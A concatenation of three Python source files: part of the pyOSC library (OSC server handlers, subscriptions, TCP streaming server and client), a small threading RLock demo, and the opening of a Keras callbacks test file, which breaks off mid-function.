def printErr(self, txt):
"""Writes 'OSCServer: txt' to sys.stderr
"""
sys.stderr.write("OSCServer: %s\n" % txt)
def sendOSCerror(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'error_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.error_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.error_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
def reportErr(self, txt, client_address):
"""Writes 'OSCServer: txt' to sys.stderr
If self.error_prefix is defined, sends 'txt' as an OSC error-message to the client(s)
(see printErr() and sendOSCerror())
"""
self.printErr(txt)
if len(self.error_prefix):
self.sendOSCerror(txt, client_address)
def sendOSCinfo(self, txt, client_address):
"""Sends 'txt', encapsulated in an OSCMessage to the default 'info_prefix' OSC-addres.
Message is sent to the given client_address, with the default 'return_port' overriding
the client_address' port, if defined.
"""
lines = txt.split('\n')
if len(lines) == 1:
msg = OSCMessage(self.info_prefix)
msg.append(lines[0])
elif len(lines) > 1:
msg = OSCBundle(self.info_prefix)
for line in lines:
msg.append(line)
else:
return
if self.return_port:
client_address = (client_address[0], self.return_port)
self.client.sendto(msg, client_address)
###
# Message-Handler callback functions
###
def handle_error(self, request, client_address):
"""Handle an exception in the Server's callbacks gracefully.
Writes the error to sys.stderr and, if the error_prefix (see setSrvErrorPrefix()) is set,
sends the error-message as reply to the client
"""
(e_type, e) = sys.exc_info()[:2]
self.printErr("%s on request from %s: %s" % (e_type.__name__, getUrlStr(client_address), str(e)))
if self.print_tracebacks:
import traceback
traceback.print_exc() # XXX But this goes to stderr!
if len(self.error_prefix):
self.sendOSCerror("%s: %s" % (e_type.__name__, str(e)), client_address)
def noCallback_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints a "No callback registered to handle ..." message.
Returns None
"""
self.reportErr("No callback registered to handle OSC-address '%s'" % addr, client_address)
def msgPrinter_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler prints the received message.
Returns None
"""
txt = "OSCMessage '%s' from %s: " % (addr, getUrlStr(client_address))
txt += str(data)
self.printErr(txt)
def serverInfo_handler(self, addr, tags, data, client_address):
"""Example handler for OSCMessages.
All registered handlers must accept these four arguments:
- addr (string): The OSC-address pattern of the received Message
(the 'addr' string has already been matched against the handler's registered OSC-address,
but may contain '*'s & such)
- tags (string): The OSC-typetags of the received message's arguments. (without the preceding comma)
- data (list): The OSCMessage's arguments
Note that len(tags) == len(data)
- client_address ((host, port) tuple): the host & port this message originated from.
a Message-handler function may return None, but it could also return an OSCMessage (or OSCBundle),
which then gets sent back to the client.
This handler returns a reply to the client, which can contain various bits of information
about this server, depending on the first argument of the received OSC-message:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'address <string>' messages, listing the server's
OSC address-space.
- 'clients' | 'targets' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
"""
if len(data) == 0:
return None
cmd = data.pop(0)
reply = None
if cmd in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('info_command', "ls | list : list OSC address-space"))
reply.append(('info_command', "clients | targets : list subscribed clients"))
elif cmd in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for addr in self.callbacks.keys():
reply.append(('address', addr))
elif cmd in ('clients', 'targets'):
if hasattr(self.client, 'getOSCTargetStrings'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
else:
cli_addr = self.client.address()
if cli_addr:
reply = OSCMessage(self.info_prefix)
reply.append(('target', "osc://%s/" % getUrlStr(cli_addr)))
else:
self.reportErr("unrecognized command '%s' in /info request from osc://%s. Try 'help'" % (cmd, getUrlStr(client_address)), client_address)
return reply
def _subscribe(self, data, client_address):
"""Handle the actual subscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>] [<filter>] [...]' string, which is then passed to
parseUrlStr() & parseFilterStr() to actually retrieve <host>, <port>, etc.
This 'long way 'round' approach (almost) guarantees that the subscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == int) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in (str,):
url += item
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
if addr != None:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
port = client_address[1]
addr = (host, port)
else:
addr = client_address
self.client._setTarget(addr, prefix, filters)
trg = self.client.getOSCTargetStr(addr)
if trg[0] != None:
reply = OSCMessage(self.info_prefix)
reply.append(('target',) + trg)
return reply
def _unsubscribe(self, data, client_address):
"""Handle the actual unsubscription. the provided 'data' is concatenated together to form a
'<host>:<port>[<prefix>]' string, which is then passed to
parseUrlStr() to actually retrieve <host>, <port> & <prefix>.
This 'long way 'round' approach (almost) guarantees that the unsubscription works,
regardless of how the bits of the <url> are encoded in 'data'.
"""
url = ""
have_port = False
for item in data:
if (type(item) == int) and not have_port:
url += ":%d" % item
have_port = True
elif type(item) in (str,):
url += item
(addr, _) = parseUrlStr(url)
if addr == None:
addr = client_address
else:
(host, port) = addr
if not host:
host = client_address[0]
if not port:
try:
(host, port) = self.client._searchHostAddr(host)
except NotSubscribedError:
port = client_address[1]
addr = (host, port)
try:
self.client._delTarget(addr)
except NotSubscribedError as e:
txt = "%s: %s" % (e.__class__.__name__, str(e))
self.printErr(txt)
reply = OSCMessage(self.error_prefix)
reply.append(txt)
return reply
def subscription_handler(self, addr, tags, data, client_address):
"""Handle 'subscribe' / 'unsubscribe' requests from remote hosts,
if the local Client supports this (i.e. OSCMultiClient).
Supported commands:
- 'help' | 'info' : Reply contains server type & version info, plus a list of
available 'commands' understood by this handler
- 'list' | 'ls' : Reply is a bundle of 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
messages, listing the local Client-instance's subscribed remote clients.
- '[subscribe | listen | sendto | target] <url> [<filter> ...] : Subscribe remote client/server at <url>,
and/or set message-filters for messages being sent to the subscribed host, with the optional <filter>
arguments. Filters are given as OSC-addresses (or '*') prefixed by a '+' (send matching messages) or
a '-' (don't send matching messages). The wildcard '*', '+*' or '+/*' means 'send all' / 'filter none',
and '-*' or '-/*' means 'send none' / 'filter all' (which is not the same as unsubscribing!)
Reply is an OSCMessage with the (new) subscription; 'target osc://<host>:<port>[<prefix>] [<filter>] [...]'
- '[unsubscribe | silence | nosend | deltarget] <url> : Unsubscribe remote client/server at <url>
If the given <url> isn't subscribed, a NotSubscribedError-message is printed (and possibly sent)
The <url> given to the subscribe/unsubscribe handler should be of the form:
'[osc://][<host>][:<port>][<prefix>]', where any or all components can be omitted.
If <host> is not specified, the IP-address of the message's source is used.
If <port> is not specified, the <host> is first looked up in the list of subscribed hosts, and if found,
the associated port is used.
If <port> is not specified and <host> is not yet subscribed, the message's source-port is used.
If <prefix> is specified on subscription, <prefix> is prepended to the OSC-address of all messages
sent to the subscribed host.
If <prefix> is specified on unsubscription, the subscribed host is only unsubscribed if the host,
port and prefix all match the subscription.
If <prefix> is not specified on unsubscription, the subscribed host is unsubscribed if the host and port
match the subscription.
"""
if not isinstance(self.client, OSCMultiClient):
raise OSCServerError("Local %s does not support subscriptions or message-filtering" % self.client.__class__.__name__)
addr_cmd = addr.split('/')[-1]
if len(data):
if data[0] in ('help', 'info'):
reply = OSCBundle(self.info_prefix)
reply.append(('server', str(self)))
reply.append(('subscribe_command', "ls | list : list subscribed targets"))
reply.append(('subscribe_command', "[subscribe | listen | sendto | target] <url> [<filter> ...] : subscribe to messages, set filters"))
reply.append(('subscribe_command', "[unsubscribe | silence | nosend | deltarget] <url> : unsubscribe from messages"))
return reply
if data[0] in ('ls', 'list'):
reply = OSCBundle(self.info_prefix)
for trg in self.client.getOSCTargetStrings():
reply.append(('target',) + trg)
return reply
if data[0] in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data[1:], client_address)
if data[0] in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data[1:], client_address)
if addr_cmd in ('subscribe', 'listen', 'sendto', 'target'):
return self._subscribe(data, client_address)
if addr_cmd in ('unsubscribe', 'silence', 'nosend', 'deltarget'):
return self._unsubscribe(data, client_address)
class ForkingOSCServer(ForkingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server forks a new process to handle each incoming request.
"""
# override the default RequestHandlerClass with the threading request handler
RequestHandlerClass = ThreadingOSCRequestHandler
class ThreadingOSCServer(ThreadingMixIn, OSCServer):
"""An Asynchronous OSCServer.
This server starts a new thread to handle each incoming request.
"""
# override the default RequestHandlerClass with the threading request handler
RequestHandlerClass = ThreadingOSCRequestHandler
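# --- Illustrative usage sketch (not part of the original module) ---------------
# A minimal sketch of how the server classes above might be wired together with
# the default handlers and a custom callback. It assumes the OSCServer
# constructor accepts a local (host, port) tuple and that OSCServer.close()
# exists, as in standard pyOSC; adjust if the actual constructor differs.
def _example_threading_server(host="127.0.0.1", port=9000):
	server = ThreadingOSCServer((host, port))
	# register the default handlers ('/info', '/error', '/print', ...)
	server.addDefaultHandlers()
	# a custom handler: every registered handler receives (addr, tags, data, client_address)
	def ping_handler(addr, tags, data, client_address):
		reply = OSCMessage("/pong")
		reply.append(data)   # echo the received arguments back
		return reply         # returned messages are sent back to the sender
	server.addMsgHandler("/ping", ping_handler)
	try:
		server.serve_forever()
	finally:
		server.close()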
######
#
# OSCError classes
#
######
class OSCError(Exception):
"""Base Class for all OSC-related errors
"""
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class OSCClientError(OSCError):
"""Class for all OSCClient errors
"""
pass
class OSCServerError(OSCError):
"""Class for all OSCServer errors
"""
pass
class NoCallbackError(OSCServerError):
"""This error is raised (by an OSCServer) when an OSCMessage with an 'unmatched' address-pattern
is received, and no 'default' handler is registered.
"""
def __init__(self, pattern):
"""The specified 'pattern' should be the OSC-address of the 'unmatched' message causing the error to be raised.
"""
self.message = "No callback registered to handle OSC-address '%s'" % pattern
class NotSubscribedError(OSCClientError):
"""This error is raised (by an OSCMultiClient) when an attempt is made to unsubscribe a host
that isn't subscribed.
"""
def __init__(self, addr, prefix=None):
if prefix:
url = getUrlStr(addr, prefix)
else:
url = getUrlStr(addr, '')
self.message = "Target osc://%s is not subscribed" % url
######
#
# OSC over streaming transport layers (usually TCP)
#
# Note from the OSC 1.0 specifications about streaming protocols:
#
# The underlying network that delivers an OSC packet is responsible for
# delivering both the contents and the size to the OSC application. An OSC
# packet can be naturally represented by a datagram by a network protocol such
# as UDP. In a stream-based protocol such as TCP, the stream should begin with
# an int32 giving the size of the first packet, followed by the contents of the
# first packet, followed by the size of the second packet, etc.
#
# The contents of an OSC packet must be either an OSC Message or an OSC Bundle.
# The first byte of the packet's contents unambiguously distinguishes between
# these two alternatives.
#
######
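# --- Illustrative framing sketch (not part of the original module) -------------
# The note above describes how OSC packets are framed on a stream transport:
# each packet is preceded by a big-endian int32 giving its size. The helpers
# below sketch that framing over a socket-like transport; they mirror what
# _transmitMsg() / _receiveMsg() in the handler below do. The names are
# hypothetical and only serve as an illustration.
def _frame_packet(payload):
	"""Return the payload prefixed with its big-endian 32-bit length."""
	return struct.pack(">L", len(payload)) + payload

def _read_framed_packet(recv_exactly):
	"""Read one length-prefixed packet; 'recv_exactly(n)' must return exactly n bytes."""
	size = struct.unpack(">L", recv_exactly(4))[0]
	return recv_exactly(size)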
class OSCStreamRequestHandler(StreamRequestHandler, OSCAddressSpace):
""" This is the central class of a streaming OSC server. If a client
connects to the server, the server instantiates an OSCStreamRequestHandler
for each new connection. This is fundamentally different from a packet-
oriented server, which has a single address space for all connections.
This connection-based (streaming) OSC server maintains an address space
per connection, because TCP servers usually spawn a new thread
or process for each new connection. Sharing a single address space object
between all of those threads would cause severe multithreading
synchronization problems. Therefore, to implement a streaming/TCP OSC
server, a custom handler must be derived which implements the
setupAddressSpace member, creating its own address space for that
particular connection. This has been done within the testbench and can serve as
inspiration.
"""
def __init__(self, request, client_address, server):
""" Initialize all base classes. The address space must be initialized
before the stream request handler because the initialization function
of the stream request handler calls the setup member which again
requires an already initialized address space.
"""
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
StreamRequestHandler.__init__(self, request, client_address, server)
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def setup(self):
StreamRequestHandler.setup(self)
print("SERVER: New client connection.")
self.setupAddressSpace()
self.server._clientRegister(self)
def setupAddressSpace(self):
""" Override this function to customize your address space. """
pass
def finish(self):
StreamRequestHandler.finish(self)
self.server._clientUnregister(self)
print("SERVER: Client connection handled.")
def _transmit(self, data):
sent = 0
while sent < len(data):
tmp = self.connection.send(data[sent:])
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend the length of the packet before the actual message (big-endian 32-bit)
len_big_endian = struct.pack(">L", length)
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error as e:
if e.errno == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end is closed in the meantime, None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receive(4)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# make the socket blocking to avoid "resource currently not available"
# exceptions: the connection socket inherits its settings from the
# listening socket, which uses a timeout so the server can be shut down.
# Here, however, we want clean, blocking behaviour.
self.connection.settimeout(None)
print("SERVER: Entered server loop")
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print("OSC stream server: Spurious message received.")
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error as e:
if e.errno == errno.ECONNRESET:
# if the connection has been reset by the client, we do not care much
# about it; we just assume our duty is fulfilled
print("SERVER: Connection has been reset by peer.")
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread safe.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so called processing queue in which
all pending messages or sub-bundles are inserted to be processed in the future.
When a sub-bundle or message gets queued, a mechanism must be provided so that
those messages get dispatched once their timetag is due. There are the following
options:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- address ((host, port) tuple): the local host & TCP-port
the server listens on for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken since the OSC address space is the same
for all connections.
"""
pass
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server), care must be taken, e.g. by installing synchronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = b"" # accumulate raw bytes received from the socket
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return None
else:
continue
except socket.error as e:
if e.errno == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return None
else:
raise e
if not tmp or len(tmp) == 0:
print("CLIENT: Socket has been closed.")
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print("CLIENT: Entered receiving thread.")
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print("CLIENT: Receiving thread terminated.")
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return False
else:
continue
except socket.error as e:
if e.errno == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend the length of the packet before the actual message (big-endian 32-bit)
len_big_endian = struct.pack(">L", length)
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
# compare the underlying sockets; the original cmp()-based comparison returned 0
# (i.e. False) for equal sockets and cmp() no longer exists in Python 3
isequal = self.socket == other.socket
if isequal and self.server and other.server:
return self.server == other.server
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
# vim:noexpandtab
|
thread_RLock.py
|
import threading
import time
# In plain terms: a re-entrant lock (RLock) lets code that already holds the "outer" lock acquire the same lock again in nested ("inner") sections.
def run1():
print("grab the first part data")
lock.acquire()
global num
num += 1
lock.release()
return num
def run2():
print("grab the second part data")
lock.acquire()
global num2
num2 += 1
lock.release()
return num2
def run3():
lock.acquire()
res = run1()
print('--------between run1 and run2-----')
res2 = run2()
lock.release()
print(res, res2)
if __name__ == '__main__':
num, num2 = 0, 0
lock = threading.RLock()
for i in range(10):
t = threading.Thread(target=run3)
t.start()
# busy-wait until only the main thread remains
while threading.active_count() != 1:
print('threading.active_count = ', threading.active_count())
else:
print('----all threads done---')
print(num, num2)
print("---- main end ----")
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import collections
import csv
import json
import os
import re
import shutil
import sys
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import keras
from keras import keras_parameterized
from keras import testing_utils
from keras.engine import sequential
from keras.layers import Activation
from keras.layers import Dense
from keras.optimizer_v2 import gradient_descent
from keras.optimizer_v2 import learning_rate_schedule
from keras.utils import np_utils
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import checkpoint_management
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the number of times each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
tf.compat.v1.train.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
if not tf.executing_eagerly():
self.skipTest('Behavior changed in v2.')
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
steps_per_epoch=5,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.evaluate(
x,
y,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.predict(
x,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
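# --- Illustrative sketch (not part of the original test suite) ---
# Shows, outside of a test, how the Counter callback above can be driven through
# keras.callbacks.CallbackList to tally hook invocations; it relies only on the
# CallbackList methods already exercised in CallbackCountsTest. The helper name
# is hypothetical.
def _example_count_predict_hooks(num_batches=3):
  counter = Counter()
  cb_list = keras.callbacks.CallbackList([counter])
  cb_list.on_predict_begin()
  for batch in range(num_batches):
    cb_list.on_predict_batch_begin(batch)
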